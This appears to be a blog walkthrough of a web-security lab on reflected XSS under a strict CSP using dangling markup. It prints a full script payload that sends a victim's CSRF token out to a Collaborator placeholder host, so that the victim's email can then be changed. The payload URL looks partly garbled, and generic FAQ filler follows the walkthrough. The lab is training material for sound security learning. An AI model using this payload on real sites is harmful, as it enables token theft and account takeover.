Introduction to Reflected XSS protected by very strict CSP, with dangling markup attack
In Reflected XSS protected by very strict CSP, with dangling markup attack, Reflected Cross-Site Scripting (XSS) vulnerabilities, protected by strict Content Security Policies (CSP), can occur when untrusted user input is not properly sanitized or validated. Dangling markup attacks can exploit these vulnerabilities, allowing attackers to bypass CSP restrictions and inject malicious scripts. To mitigate this risk, web developers must ensure thorough input validation and output encoding practices. Prioritizing web security, implementing a comprehensive CSP, and conducting regular security assessments can minimize the risk of XSS vulnerabilities, protecting web applications, safeguarding user data, and maintaining a secure online environment.
Lab Solutions | Practical Work Time XSS protected by very strict CSP
This lab using a strict CSP that blocks outgoing requests to external web sites.
To solve the lab, first perform a cross-site scripting attack that bypasses the CSP and exfiltrates a simulated victim user’s CSRF token using Burp Collaborator. You then need to change the simulated user’s email address to hacker@evil-user.net.
You must label your vector with the word “Click” in order to induce the simulated user to click it. For example: <a href="">Click me</a>
You can log in to your own account using the following credentials: wiener:peter
Stepwise Solution of the lab:-
After accessing the lab you can see there is an option called My account.
Click on My account.
As they provided a credential:- wiener:peter . Put this one on the login form. Now click on Log in.
We logged in as wiener and my email is: wiener@normal-user.net.
Now move to Burp Suite Collaborator and click on Copy the clipboard. Note that copied URL.
Click on Go to exploit server and scroll down a little bit.
Copy this below payload.
<script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%/web-security/cross-site-scripting/content-security-policy/22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script>
Now time to take that Copied URL that you found from Burp Collaborator. And replace it in BURP-COLLABORATOR-SUBDOMAIN.
Then What you’ve to do is replace YOUR-LAB-ID with the lab ID. You can easily remove the whole default URL. Example:- Before (https://YOUR-LAB-ID.web-security-academy.net/my-account
After (https://0a9300c7039decb5804b7b03006e0030.web-security-academy.net/my-account).
Do the same to YOUR-EXPLOIT-SERVER-ID . Copy the exploit server ID and paste it.
I hope you had loved reading this article after you had completed this article we highly recommend you to study the next article: Reflected XSS protected by CSP, with CSP bypass, please don’t forget to leave a comment over here and share it with your friends as well, Good Luck!
………………………….CONTINUE YOUR ARTICLE FROM HERE………
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
